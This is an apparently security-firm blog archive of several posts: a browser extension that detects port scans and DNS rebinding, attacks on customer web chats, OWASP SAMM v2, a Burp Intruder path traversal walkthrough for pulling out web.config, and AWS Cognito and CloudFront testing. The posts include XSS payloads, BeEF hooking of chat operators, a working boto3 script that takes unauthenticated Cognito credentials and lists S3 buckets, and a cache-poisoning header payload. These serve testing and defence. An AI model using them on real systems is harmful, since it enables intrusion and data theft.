Tuesday, June 30, 2020

Behave! A monitoring browser extension for pages acting as "bad boi".

Browsing: What Could Go Wrong?

There's so much literature about client side attacks, but most of the focus is usually about classical malware attacks, exploiting software vulnerabilities.

Malicious scripts happen to be executed every day by thousands of people and most of the times Malware/Virus/Malvertising try to exploit vulnerabilities or to lure the user to install software on his own machine with the intent of staying undetected as much as possible in order to do its criminal business. 
That's what AntiMalware/Virus/[...] are for.

It's the principle of minimum energy: usual malware wants comfortable, smooth, local execution. 

However, there's quite a number of alternative attacks on the client side, with minimal fingerprint that tend to drag less attention and that might go unnoticed on several environments.

Indeed there's a history of  such alternative attacks as:
  • Local Port Scan: Impact: Information Gathering which could be used to perform further client side attacks (Malware) or to have a better unique user profile (Advertising/RiskAnalysis).
  • Cross Protocol attacks: Impact: according to the protocol there might be an abuse of specific features. Such as SMTP abuse etc.
  • DNS rebinding: Impact: SOP bypass resulting in reading sensitive information of internal network servers.

which are not news at all. They are, indeed, quite old attacks that are still as reliable as difficult to completely "fix" by browser vendors because they abuse core features of the Web ecosystem.

Behave! A Monitoring Extension for pages acting as "bad boi"

With those attacks in mind, we thought that, by taking advantage of the browser API at extension layer, a browser extension might help monitoring HTML pages behavior.
That's Behave!
Available as an extension for:

It monitors and warn if a web page performs any of following actions:

  • Browser based Port Scan
  • Access to Private IPs
  • DNS Rebinding attacks to Private IPs
Here's Behave! pointing its finger to a malicious page hosted by at.tack.er host performing access to local IPs:



image


Behave! Future Plans 

There's a quite a bunch of stealth&malicious client side techniques that could be abused at several levels of security that might be monitored by Behave! in the future.

Monday, May 18, 2020

Remote Working - Web Chats: Threats and countermeasures

Introduction

With recent worldwide events, a sharply increasing number of companies are offering remote services to their customers. Even traditional businesses are implementing new features or pushing the migration of existing features to new needs of dematerialization of human-to-human relationships. 
Web chats are an example of such trends.

Web chats

Rich messages web chats are a common feature implemented by companies to overcome the need of social distancing, while maintaining a close relationship with customers.
An example of rich messages web chat would be a graphical widget loaded by web site visitors to establish a chat session with a human operator, with the objective of sharing documents in a multimedia environment: users can share PDF files (e.g. personal documents, scans), video or audio files (e.g. vocal record of a formal declaration, acceptance of conditions and clauses for contracts, identity recognition) or even unpredicted formats, to deal with the abundance of multimedia files offered by end-user environments.
To do so, preview feature has a crucial role.

Scenario

As shown below, a typical scenario is a web server exposing chat capabilities, allowing human operators in a trusted network (e.g. a LAN) to interact with remote customers.
Usually, customers interact with the chat using a common browser over an untrusted network (the Internet, their own device); chat operators interact with customers using a browser or the backoffice component of the web chat, which commonly offers rich features, such as document viewing, session management, multiple channels interaction and capabilities to interact with customers in an "enhanced" manner.

This article will describe several attack vectors from potentially malicious remote customers against targeted chat operators and the software they use to interact with customers: the objective of described workflows is attacking the trusted internal corporate network.



Rich data exchange interaction

Backoffice chat components trie to recognize messages, files and URLs submitted by chat users with the aim of previewing them or offering operators with advanced tools to manipulate data.
Different recognition approaches are usually in place: parse file extensions, MIME type of uploaded files, and actually reading the real content of the file prior to supplying it to the operator.
If the recognition procedure does not thoroughly include a secure implementation of all the mentioned approaches, chat operators and internal resources may be prone to security threats.

Threats

Web chats can accept several formats for files, sent by users (e.g. with drag & drop) or submitting URLs.

HTML payloads

The simplest and most known attack vector is abusing the HTML parser of web chats:

Customer enters <b>ciao!</b>
Operator sees ciao!

Customer enters <script>alert("XSS!")</script>
Operator sees:


Malformed PDF file upload

User supplied PDF files can be opened by chat operators in embedded viewers in the backoffice component of the web chat or downloaded on their workstation, within the trusted corporate network.
Such files can be vehicle of arbitrary code (e.g. JavaScript or other active code), which can therefore be executed on the endpoint of chat operators, exploiting known vulnerabilities in the browser or in any other software used by operators to view the file.

As an example, PDF files can contain dynamic JavaScript code, very similar to how XSS attacks work:



Thus, malformed PDFs, especially if loaded with an outdated Adobe Acrobat version, can be an attack vector for further exploits (e.g. meterpreter payloads, malwares, droppers..) against the internal network, the browser, the operating system or other components in the trusted backoffice environment.

Note: any security concern for PDF files should be extended to Office documents (Word, Excel, Powerpoint), especially if older and/or not hardened versions of Microsoft Office are in use.
For example threats may include malwares embedded in Office documents or CSV Formula Injection attacks.

Malicious URLs (Abusing preview feature)

Web chats tries to parse URLs pasted by users' messages, with the aim of previewing their content.
If the parsing procedure is executed correctly, the PDF is previewed by an embedded viewer, and it can therefore lead to scenarios described above.
On the contrary, if the parsing procedure is not correctly executed, the preview mechanism (triggered by the presence of ".PDF" string in the URL) can lead to unexpected events.

For example, if the URL ends with ".pdf" string, the web chat may attempt to dynamically load any preview module. As shown below, ".pdf" in the URL does not indicate a real PDF file, but a folder named ".pdf" on an arbitrary web server.

Content of the attacker's web site:


$ ls ./.pdf -1
minded (executable file)
minded.html (malicious HTML file)
minded.pdf (malicious PDF file)


Behaviour of the preview on chat operator's software:



Several social engineering scenarios can be constructed over this behaviour, for example convincing the chat operator (whose job is trying to efficently interact with a customer) to download other files.

Semi-automatic scenarios, on the other hand, can include the execution of arbitrary code in HTML files, abusing the preview feature. For example, it would be possible to spawn a BeEF HTML hook against the browser in use by the chat operator:



The command & control server (used by the attacker / evil customer) would look similar to the following:



Consequently, the attacker can use a large plethora of social engineering / hijacking techniques.

For example, spawning fake system messages / Java Applet load requests:



Or even spawning fake Clippy Office Assistants:



Embedded players

Web chats may also include MP3 players, which, depending on the library in use by the chat software, may be prone to vulnerabilities related to outdated software modules.



Mitigations

  • Validate any uploaded file according to a predefined list of expected file types:
- Extension
- Content Type
- Actual content of the file
  • Rescale / Resize with a 1:1 ratio any multimedia file, before allowing chat operators to open the file, in the attempt of removing any metadata
  • Properly hardening procedures should be applied to any software in use by chat operators:
- Update PDF viewer software to the latest available version
- Apply proper security options (e.g. Enhanced security and protected mode in Adobe Acrobat) to harden PDF viewer software
  • Define a list of allowed file types for the preview feature, avoiding any other format: if chat operators are expected to receive only URLs, documents and images, define a list where only PDFs and JPGs/PNGs are allowed, while any other extension is excluded from previewing components.

References

https://acrobatusers.com/assets/collections/tutorials/legacy/tech_corners/javascript_corner/tips/2006/popup_windows_part2/AlertBoxExamples.pdf
https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/enhanced.html
https://owasp.org/www-community/attacks/CSV_Injection
https://beefproject.com/

Thursday, April 30, 2020

OWASP SAMM v2: lessons learned after 9 years of assessment


OWASP SAMM v2 is out!


OWASP SAMM (Software Assurance Maturity Model) is the OWASP framework to help organizations assess, formulate, and implement, through our self-assessment model, a strategy for software security that can be integrated into their existing Software Development Lifecycle (SDLC).

The new OpenSAMM


The original model OpenSAMM 1.0 was written by Pravir Chandra and dates back to 2009. Over the last 10 years, it has proven a widely distributed and effective model for improving secure software practices in different types of organizations. With SAMM v2, further improvements have been made to deal with some of its perceived limitations.

For those organizations using earlier versions of SAMM, it is important to take the time to understand how the framework has evolved in favor of automation and better alignment with development teams.

The new model supports maturity measurements both from coverage and quality perspectives. It added new quality criteria for all the activities. There is an updated scoring SAMM toolbox designed to help assessors and organizations with their software assurance assessments and roadmaps.

What about your development models?


The new SAMM model is development paradigm agnostic. It supports waterfall, iterative, agile, and DevOps development. The model is flexible enough to allow organizations to take a path based on their risk tolerance and the way they build and use software. The model is built upon the core business functions of software development, with security assurance practices.

What’s changed with SAMM v2?


The version 2.0 of the model now supports frequent updates through small incremental changes on specific parts of the model with regular updates to explanations, tooling, and guidance by the community.

The 3 maturity levels remain as they were. Level 1 is initial implementation; level 2, structured realization; and level 3, optimized operation.

This is the updated SAMM version 2 model:





The major changes are the following:

    - From 4 to 5 business functions and from 12 to 15 Security Practices.
    - The 4 business functions of version 1.5 now become 5 core business functions:

    - Governance
    - Design (which used to be Construction)
    - Implementation
    - A redesigned Verification function
    - Operations

    - Implementation, to represent a number of core activities in the build and deploy domains of an organization. It also includes a new security practice that deals with Defect Management or fixing process.
    - New security practices are: Secure Build, Secure Deployment, Defect Management, Architecture Analysis, Requirements-driven Testing.
    - A new concept appears with version 2, called Streams: activities are now presented in logical flows throughout each of the now 15 security practices, divided into two streams, which aligns and links the activities in the practice over the different maturity levels. Each stream has an objective that can be reached in increasing levels of maturity.

    - The model now supports maturity measurements both from a coverage and a quality perspective. There are new quality criteria for all the SAMM activities, and an updated scoring model to help SAMM assessors and organizations with their software assurance.

What we learned in the last 9 years of assessments

Minded Security did many Software Security Assessments based on SAMM v1 and v1.5.  The following diagram shows the results of  the assessments:



We collected SAMM assessment results performed until 2012 (blue line) and then from 2013 to 2015 (orange line) and then from 2016 to 2018 (gray line).

As you can see from the 2012’s results, the first answer of a Company to the software security issues is: testing, testing, testing!

What we learned during these years is that testing is NOT the solution of Software Security. Testing is just a part of your Software Security journey.

The security efforts of software developers are currently being stymied by time constraints, complexity, and deployment frequency.

The timeline for reporting and fixing critical vulnerabilities – up to one month to share, up to six months to fix – remains unacceptably long.

Today we need instant security feedback: key to achieving a fix within hours of discovery are new standards, more automation, and promptly sharing vulnerability information internally.

That’s why you need to improve all the security practices of the SAMM model in order to manage Software Security properly. A SAMM assessment permits you to have a complete vision of the problem: today the SAMM framework has become crucial to build an efficient, solid Software Security Roadmap in the Companies.





Tuesday, March 17, 2020

How to Path Traversal with Burp Community Suite


Introduction


A well-known, never out of fashion and highly impact vulnerability is the Path Traversal. This technique is also known as dot-dot-slash attack (../) or as a directory traversal, and it consists in exploiting an insufficient security validation/sanitization of user input, which is used by the application to build pathnames to retrieve files or directories from the file system that is located underneath a restricted parent directory.
By manipulating the values through special characters an attacker can cause the pathname to resolve to a location that is outside of the restricted directory.

In OWASP terms, a path traversal attack falls under the category A5 of the top 10 (2017): Broken Access Control, so as one of top 10 issues of 2017 we should give it a special attention.

In this blog post we will explore an example of web.config exfiltration via path traversal using Burp Suite Intruder Tool.

Previous posts about path traversal:
How to prevent Path Traversal in .NET
From Path Traversal to Source Code in Asp.NET MVC Applications

Testing Step-by-Step

First, get a copy of Burp Suite Community Edition, a useful testing tool that provides many automated and semi-automated features to improve security testing performances.
In particular, Burp Intruder feature can be very useful to exploit path traversal vulnerabilities.

Suppose there's a DotNet web application vulnerable to path traversal. In order to exploit the issue the attacker can try to download the whole source code of the application by following this tutorial.

Once the attacker finds a server endpoint that might be vulnerable to Path Traversal, it's possible to send it to Burp Intruder as shown in the following screenshot.



On the Intruder tab, the target has been set with the request that it will be used to manipulate in order to find the web.config file.

Make sure that the payload is correctly injected in the right attribute position, if not, perform a "Clear §" action, then select the attribute to fuzz and click on "Add §" button. 



To set the payloads that Burp Intruder will use to perform the requests, download  file traversals-8-deep-exotic-encoding.txt  from fuzzdb project  and provide it to Burp Intruder by executing the following actions:
  • go to the "Payloads" sub-tab;
  • select from dropdown list "Payload type" the value "Simple List";
  • in the panel "Payload Options" click on "Load..." button and select the fuzzing path traversal file (as shown in following screenshot).


Next step is to add a Payload Processing rule in order to match and replace the placeholder "{FILE}" with the filename we want to exfiltrate (in our example "web.config"), so click on "Add button".



In the paylod processing rule modal, add the Match for string "{FILE}" and the Replace for string "web.config", as shown in following screenshot:


In order to improve the probability of a successful attack, it is possible to add a Grep-Match value (if known), in order to easily identify a positive response.

Remove all already existing rules:



Then add a new Grep-Match rule for "<configuration>" string, that indicates web.config file has been found.




Finally, it's suggested to tune the Request Engine options basing on web server limitations (anti-throttling, firewall system, etc) in order to avoid false negative results, for example increasing retry delay.




Let's launch the attack. 

If the endpoint will result vulnerable to path traversal, the column "configuration" will be checked.



Friday, February 14, 2020

A practical guide to testing the security of Amazon Web Services (Part 3: AWS Cognito and AWS CloudFront)

This is the last part of our 3 posts journey discussing the main Amazon Web Services and their security.

In the previous two parts we discussed two of the most used Amazon services, namely AWS S3 and AWS EC2. If you still haven't checked them, you can find them here: Part 1 and Part 2.

In this final post we discuss two additional services that you might encounter when analyzing the security of a web application: AWS Cognito and AWS CloudFront.
These are two very different services related to supporting web applications in two specific areas:

  • AWS Cognito aims at providing an access control system that developers can implement in their web applications. 
  • AWS CloudFront is a Content Delivery Network (CDN) that delivers your data to the users with low latency and high transfer speed.


AWS Cognito

It provides developers with an authentication, authorization and user management system that can be implemented in web applications and is divided in two components:

  • user pools;
  • identity pools. 
Quoting AWS documentation on Cognito:
User pools are user directories that provide sign-up and sign-in options for your app users. Identity pools enable you to grant your users access to other AWS services. You can use identity pools and user pools separately or together.
From a security perspective, we are particularly interested in identity pools as they provide access to other AWS services we might be able to mess with.

Identity pools are identified by an ID that looks like this:
 us-east-1:1a1a1a1a-ffff-1111-9999-12345678

A web application will then query AWS Cognito by specifying the proper Identity pool ID in order to get temporary limited-privileged AWS credentials to access other AWS services.

An identity pool also allows to specify a role for users that are not authenticated.
Amazon documentation states:
Unauthenticated roles define the permissions your users will receive when they access your identity pool without a valid login.




This is clearly something worth checking during the assessment of a web application that takes advantage of AWS Cognito.

In fact, let's consider the following scenario of a web application that allows access to AWS S3 buckets upon proper authentication with the identity pool that provides temporary access to the bucket.

Now suppose that the identity pool has also been configured to grant access to unauthenticated identities with the same privileges of accessing AWS S3 buckets.

In such a situation, an attacker will be able to access the application credentials to AWS.

The following python script will try to get unauthenticated credentials and use them to list the AWS S3 buckets.

In the following script, just replace IDENTITY_POOL with the Identity Pool ID identified during the assessment. 


# NB: This script requires boto3.
# Install it with:
# sudo pip install boto3
import boto3
from botocore.exceptions import ClientError

try:
   # Get access token
   client = boto3.client('cognito-identity', region_name="us-east-2")
   resp =  client.get_id(IdentityPoolId=[IDENTITY_POOL])

   print "\nIdentity ID: %s"%(resp['IdentityId'])
   print "\nRequest ID: %s"%(resp['ResponseMetadata']['RequestId'])
   resp = client.get_credentials_for_identity(IdentityId=resp['IdentityId'])
   secretKey = resp['Credentials']['SecretKey']
   accessKey = resp['Credentials']['AccessKeyId']
   sessionToken = resp['Credentials']['SessionToken']
   print "\nSecretKey: %s"%(secretKey)
   print "\nAccessKey ID: %s"%(accessKey)
   print "\nSessionToken %s"%(sessionToken)

   # Get all buckets names
   s3 = boto3.resource('s3',aws_access_key_id=accessKey, aws_secret_access_key=secretKey, aws_session_token=sessionToken, region_name="eu-west-1")
    print "\nBuckets:"
   for b in s3.buckets.all():
       print b.name

except (ClientError, KeyError):
   print "No Unauth"
   exit(0)




If unauthenticated user access to AWS S3 buckets is allowed, your output should look something like this:


Identity ID: us-east-2:ddeb887a-e235-41a1-be75-2a5f675e0944

Request ID: cb3d99ba-b2b0-11e8-9529-0b4be486f793

SecretKey: wJE/[REDACTED]Kru76jp4i

AccessKey ID: ASI[REDACTED]MAO3

SessionToken AgoGb3JpZ2luELf[REDACTED]wWeDg8CjW9MPerytwF

Buckets:
mindeds3log
mindeds3test01



AWS CloudFront

AWS CloudFront is Amazon's answer to a Content Delivery Network service which purpose is to improving the performances of delivering content from web applications.
The following images depict the basics of how CloudFront work.



The browser requests resource X from the edge location.
If the edge location has a cached copy of resource X it simply sends it back to the browser.

The following picture describes what happens if resource X is not cached in the edge location.





  • The browser requests resource X to the edge location which doesn't have a cached version. 
  • The edge location thus requests resource X to its origin, meaning where the original copy of resource X is stored. (This is decided upon configuring CloudFront for a given domain. )
  • The origin location can be, for example, an Amazon service such as an S3 bucket, or a different server not being part of Amazon. 
  • The edge location receives resource X and stores it in its cache for future use and finally sends it back to the browser. 

This simple caching mechanism can be very helpful when it comes to improve the performances of querying a web application but it might also hide some unwanted behavior.

As recently shown by James Kettle, web applications relying on cache for dynamic pages should be aware of the possibility to abuse such caching functionality and deliver malicious content to the users a.k.a. cache poisoning.
Briefly, as described by Kettle in his post, web cache systems need a way to uniquely identify a request in order to not keep contacting the origin location.
To do so, few parts of an HTTP request are considered to fully identify the request and are called cache keys. Whenever a cache key changes, the caching system will consider it as a different request and, if it doesn't have a cached copy of it, will contact the origin location.
The basic idea behind web applications cache poisoning is to find an HTTP parameter that is not a cache key and that can be used to manipulate the content of a web page. When such a parameter is found, an attacker might be able to cache a request containing a malicious payload for that parameter and, whenever other users perform the same request, the caching system will answer with the cached version containing the malicious payload.

Let's consider the following simple request taken from James' post:


GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: canary

HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://canary/cms/social.png" />



The value for X-Forwarded-Host has been used to generate an Open Graph URL inside a meta tag in the HTML of the web page. By changing canary with a."><script>alert(1)</script> it's possible to mess with the HTML and generate an alert box.


GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>



HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://a."><script>alert(1)</script>/cms/social.png" />

However, in this case, X-Forwarded-Host is not used as a cache key. This means that it is possible to cache the request containing the alert code in the web cache so that it will be served to other users in the future. As it becomes clear from James' post, X-Forwarded-Host and X-Forwarded-Server are two widely used HTTP headers that do not contribute in the set of cache keys and are valuable candidates to perform cache poisoning attacks. James has also developed a Burp plug-in called param-miner that can be used to identify HTTP parameters that are not used as cached keys.

Conclusion

This post concludes our journey into the main Amazon Web Services and how to account for them when testing the security of web applications.
It is undeniable that AWS provides a comprehensive solution that companies take advantage of instead of having to take care of the entire infrastructure by themselves. However, companies are the ones in charge of managing the configurations of the services they decide to use. It thus becomes crucial to test and verify such configurations.

Thursday, April 11, 2019

Secure Development Lifecycle: the SDL value evolution. Part 1

Observability and metrics paradox
It is also about observability: ”If a tree falls in a forest and no one is around to hear it, does it make a sound?” …or… What is the return value (in dollars number) of having a better SDL in place if your company wasn’t shaken by cybersecurity incidents? I see a little paradox here, after spending big budget into security you cannot measure the returns, even more, the returns are less visible: you don’t have incidents in the first place…and if they happen then “someone saves you”, you may have prevented 9/10 of incidents but it is difficult to make a counterfactual argument at that point.
Oh yes, if you had big problems in the past you can then see the statistical improvements over time, Microsoft did.


From: https://www.owasp.org/images/9/92/OWASP_SwSec5D_Presentation_-_Oct18.pdf
Microsoft case teaches
Microsoft had a nice market position and did deal with security in the early 2000s. Not any company has a de facto monopoly in the market. Your company has competitors and alternatives, needs reputation…and let’s not dig too deep into cyber-fines scenarios.
MS in the early 2000’s put great efforts in defining and in applying SDL and still nowadays MS SDL is the reference implementation. That was the genesis of SDL as we know it today, practices like STRIDE Threat Modeling are de-facto standards in the industry.
Fortunately, the metrics paradox is getting weakened by the fact that SDL is becoming a value in itself, that can be shown, that completes quality, that enhances reputation, marketing and it is content more than form (not only compliance), we’ll see how security principles are taken over formal compliance checklists.
Dear <big tech firm here>, can I evaluate your Secure Development Lifecycle?
Supply chain customers start to demand secure process itself, not only secure products and certifications (assuming it is even plausible). An example is the case of UK Gov relation with Huawei, but I’m confident others will follow. The next extract is from Huawei cyber security evaluation centre oversight board: annual report 2019 
“3.35 …analysed the adherence of the product to part of Huawei’s own secure coding guidelines, namely safe memory handling functions. … analysed for the use … of memcpy()-like, strcpy()-like and sprintf()-like functions in their safe and unsafe variants.”
Not many companies with some complexity and history could quietly survive a similar analysis.
Principles based practices and cyber-environmentally safety requirement
The security demand cannot be met only by compliance requirements, compliance, in its various forms (PCI, ISOXXXX) is still a necessary “sine qua non” condition, but customers and counterparties demand more substance behind that. We can observe this “substance winning over form” for example in GDPR as a principles based regulation, as well as in the demand for security processes results to key vendors (see Huawei report from cybersecurity government agency).
From Wikipedia, GDPR: “Controllers of personal data must put in placeappropriate technical and organisational measures to implement the data protection principles
With that clear in mind, it doesn’t take too long to forecast that an enterprise investing in security principles and substantial SDL will have a double advantage, the genesis/primordial one: more secure product (e.g. MS 2002) but also the newer one coming for the visibility, that customers demand now more and more.
SDL was a means to have more secure product, today even more, is becoming a company “value” and something in the realm of morality and ethics, not so different from environmental sustainability. Also, the earlier a company is in the supply chain (hardware, operative system, authentication server, payment gateway, dev frameworks) the more it should care as the biggest is the damage they can do to the information technology environment. Latests year’s Spectre, Heartbleed, EternalBlue, BIOS and software update security incidents are just a few examples of polluting the supply chain.
Metrics transformation; lead vs lag indicators
Take this example of metrics
“the percentage of people wearing hard hats on a building site is a leading safety indicator. A lagging indicator is an output measurement, for example; the number of accidents on a building site is a lagging safety indicator.”
From: https://www.intrafocus.com/lead-and-lag-indicators/
As the security development practices evolve, the same should happens to related metrics. Formal compliance frameworks and lack of severe incidents may have been enough in the past, but neither happens before software development itself. On the other hand, leading indicators are measured during the SDL; leading efforts could be measured in both resources expenditures and assessing maturity level, better both.
After all, would you trust a nuclear power plant just because is law compliant and had no incidents in the last 10 years even IF they don’t spend a buck in security? Let’s put it this way: consider that our planes and power plants use a lot of software, as well as our future medical operation machine, human and self driving cars etc… and I want to see organizations passionately investing in security, in the smartest, and more efficient way, please!
In the next part(s) I want to dig deeper into the evolution of SDL practices in the cyber security market.

Secure Development Lifecycle: the SDL value evolution. Part 2

Evolution of SDL practices: from custom to product to service
The increasing visibility trend discussed in Part 1, of course, is impacting the current cybersecurity practices, in terms of maturity of evolution, also toward a “service”.
Organisations consist of value chains that are comprised of components that are evolving from genesis to more of a commodity. It sounds fairly basic stuff but it has profound effects because that journey of evolution involves changing characteristics.
Following is a Wardley Map (product evolution/visibility graph) comparing Penetration Testing (PT, more a reacting activity) and SDL (preventing vulnerabilities):



The previous example is a comparison over time (name it: 10 years) of one of the most common practice in cybersecurity. Penetration Testing (PT) went form a custom made exercise, to a product and shifting to a commodity (as a service PT, crow found style bug bounty, etc…) whether the ‘Prevent’ activity: SDL, is gaining the shape of a product and finally more visibility that, by the way, means money.
Pushing security left in the lifecycle, but also pushing up in visibility


from: https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95

Pushing left like a Boss series explains it very well: how to prevent better, but the map of the evolution of the SDL shows also the point discussed in Part 1 of the article: the visibility value on having an SDL.
The birth of a new language is the result (for some the cause) of this “pushing left”. DevSecOps is nowadays term to express this fact. “Threat Model” is another term gaining traction.
DevSecOps imply that the “security guys” will be working together with the developers and also that the developer will be more involved in the security practices. I think this is a real advancement in the SDL field, of course, vendors will overload this term with fancy product associations, that is always expected…we know that Dev*Ops is more a principle/value more than a bunch of products.
On the contrary, PenTest (black box testing, often disconnected to the SDL, non automated, single points in time activity link) will have hard times in the near future in an educated SDL environment. Will rules-based compliance follow this trend soon? Don’t know this answer. But if you think you need PenTest…most likely you need even more to mature you SDL!
Security says yes!
DevSecOps values push toward software evolution (CD: continuous delivery of new features), automation and quality (continuous integration). It is a fertile ground for increasing the maturity of the SDL. Investing in SDL means also more functional products in the short/medium term too, not only more secure and less risky. Of course, the challenge is to transform a legacy product/team to this more integrated approach. Intrinsic problems like lack of specific expertise in the market are still plaguing the cybersecurity and SLD sector. It is also something that cannot be implemented in “few weeks”. Defining a custom plan, called also programme or roadmap, based on maturity models like OWASP SAMM and OWASP 5D, made up of incremental enhancement over time have been successful in several organizations. It may take years but there are not many shortcuts.